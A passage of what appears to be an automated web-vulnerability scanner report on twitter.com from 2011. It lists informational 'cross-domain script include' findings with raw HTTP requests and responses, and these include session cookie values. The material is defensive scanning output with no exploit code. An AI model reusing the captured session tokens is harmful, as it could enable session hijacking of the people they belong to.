Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-69634-53816
ETag: "ec4d064b3111971c1cbbd076806b6c98"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01003
Content-Type: text/html; charset=utf-8
Content-Length: 54961
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.417. http://twitter.com/ebello previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ebello

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234690-97078-11272
ETag: "3ac69aa6fba7872c9356566327e68065"
Last-Modified: Fri, 28 Jan 2011 17:11:30 GMT
X-Runtime: 0.00791
Content-Type: text/html; charset=utf-8
Content-Length: 54761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.418. http://twitter.com/ericmmartin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ericmmartin

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224922-26410-25724
ETag: "b52f4470d0eb7102204e56e131ce2f8f"
Last-Modified: Fri, 28 Jan 2011 14:28:42 GMT
X-Runtime: 0.50069
Content-Type: text/html; charset=utf-8
Content-Length: 58034
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.419. http://twitter.com/ericmmartin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ericmmartin

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234544-28409-10830
ETag: "313b3007599a1168ba8e042cedcc9002"
Last-Modified: Fri, 28 Jan 2011 17:09:04 GMT
X-Runtime: 0.01156
Content-Type: text/html; charset=utf-8
Content-Length: 57914
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.420. http://twitter.com/ericmmartin/status/30128016856195073 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ericmmartin/status/30128016856195073

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225136-38088-7388
ETag: "f6a17b6b0e09ba551b3fcd0add86e0b6"
Last-Modified: Fri, 28 Jan 2011 14:32:16 GMT
X-Runtime: 0.04877
Content-Type: text/html; charset=utf-8
Content-Length: 13727
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiU1MWM0MjRl%250AMGRlMzJjMmY1NTExZmQxNzlhOGIzZGNjMzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--b552be777e5e2a8892e6adb3be303462d0947af8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.421. http://twitter.com/ericmmartin/status/30128016856195073 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ericmmartin/status/30128016856195073

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ericmmartin/status/30128016856195073 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234557-34796-32877
ETag: "d40ce77f8be108331b24d45f1d634f24"
Last-Modified: Fri, 28 Jan 2011 17:09:17 GMT
X-Runtime: 0.06272
Content-Type: text/html; charset=utf-8
Content-Length: 13598
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOhVpbl9uZXdfdXNlcl9mbG93%250AMDoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMxMWM6%250ADHR6X25hbWUiFENlbnRyYWwgQW1lcmljYToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--9efe61bfedd721e7bb9d52a6d8f907146da272da; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.422. http://twitter.com/ericmmartin/status/30128016856195073 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ericmmartin/status/30128016856195073

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224926-9669-3756
ETag: "8a207398e91696a15179ff55977c38f1"
Last-Modified: Fri, 28 Jan 2011 14:28:46 GMT
X-Runtime: 0.04848
Content-Type: text/html; charset=utf-8
Content-Length: 13726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiVmMzE1MDNl%250AMzcxMDU0OWE3YjU2YTE5Zjk1OGRkMDBmMToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--f20b609817e7de3826da0bcc06ca803fab8dec0f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.423. http://twitter.com/gercheq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/gercheq

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-54075-30524
ETag: "4793986d74da0ff9abc545ba99de39af"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.27545
Content-Type: text/html; charset=utf-8
Content-Length: 51283
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
